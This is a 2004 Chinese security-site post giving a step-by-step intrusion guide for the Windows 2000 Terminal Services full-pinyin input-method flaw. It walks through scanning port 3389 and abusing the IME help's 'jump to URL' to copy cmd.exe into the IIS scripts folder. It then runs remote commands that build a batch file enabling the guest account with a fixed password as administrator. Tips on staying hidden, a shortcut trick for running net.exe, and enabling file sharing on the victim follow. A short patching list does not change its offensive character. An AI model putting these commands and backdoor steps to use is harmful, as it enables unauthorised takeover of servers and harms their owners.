黑基网 首页 学院 网络安全 查看内容

输入法漏洞之完全心得及问题

2004-9-29 20:05| 投稿: security

摘要: 由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼(^^我只在全拼下成功)的w2k 服务 器存在着远程登陆并能获取超级用户权限的严重漏洞。 小女子几经周折、胆战心惊 、多次尝试 ,终于明白个中...
由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼(^^我只在全拼下成功)的w2k 服务 器存在着远程登陆并能获取超级用户权限的严重漏洞。 小女子几经周折、胆战心惊 、多次尝试 ,终于明白个中道理,不需上传任何文件成功入侵并装个后门 (现在流行走后门^^)。 其过程如下: 1.扫描 3389 port 终端服务默认; 2.用终端客户端程序进行连接; 3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下 家吧,人家打补丁了),点帮助,点输入法入门; 4.在"选项"菜单上点右键--->跳转到URL",输入:c:\winnt\system32\cmd.exe.(如果不能确定NT系 统目录,则输入:c:\ 或d:\ ……进行查找确定); 5.选择"保存到磁盘" 选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操 作,所以这个过程很快就会完成; 6.打开IE,输入http://ip/scripts/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就完 成了第一步; 7http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat 8http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat 9http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat 10http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下: net user guest /active:yes net user guest elise net localgroup administrators /add guest 11.在"选项"菜单上点右键--->跳转到URL",输入:c:\inetpub\scripts\go.bat --->在磁盘当前位 置执行; 12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢! (我 喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做 了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:) 注意事项: 1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正 打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器 名,并能发消息给你! 2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙,小 女子为此不知浪费了多少的网费和精力。 3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!小女子可就这样吃 亏过一次,上传木马中断没有完成,第二天,人家已打上补丁,再也无法进入!并且还留下了 xxxx……:( 个人观点: 1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木 马等; 2.url的跳转下,你将拥有超级用户的权限,好好利用吧:) 3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次 吧!:) 4.此法似乎与对方的防火墙无关哦! 堵漏办法: 1.打补丁; 2.删掉全拼输入法,用标准就成了嘛^^; 3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32 \termsrv.exe;(如果哪天你潜入服务器,发现了termsrv.exe文件,而又没探测到3389端口,你知 道该怎样做了吧?^^) 问题(高手请赐教): 1.如果IE下的www访问需要密码,怎办? 2.如果对方不开www服务怎办?我试过了直接跳转url:net user hack elise /add命令,不能成功! 3.如果对方139 port不开,有什么办法打开吗?w2k server中怎样控制139端口? 答案: 1.跳至url:\winnt\system32 (系统目录在跳至url上已显示出来啦!!) 2.选中net.exe文件,点右键--->创建快键方式--->在快捷方式下点右键--->快捷方式的目标后加 入:user guest /active:yes ,其他的不用再说了吧:) 此方法避开了我的1.2两个问题哦!! 得出结论: 1.你虽可运行程序,但无法看见,所以对交互式得程序得另想办法哦,:)如regedt32、notepad等; 2.快捷方式是执行程序得好途径。 ps.我的第3个关于139port问题的答案似乎再这里: 我用guest登陆到对方的服务器,打开拨号网络的属性,嘿,发现他的文件打印共享和微软网络客户没 打勾呢!! 他偷懒,那我帮他勾上了:) 不过,他得重新拨号才有效哦! 不知道这时他得139开了 否,我没时间等他再拨号了。(如你想断开他得拨号会出错得哦,因为我试过了;p)
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部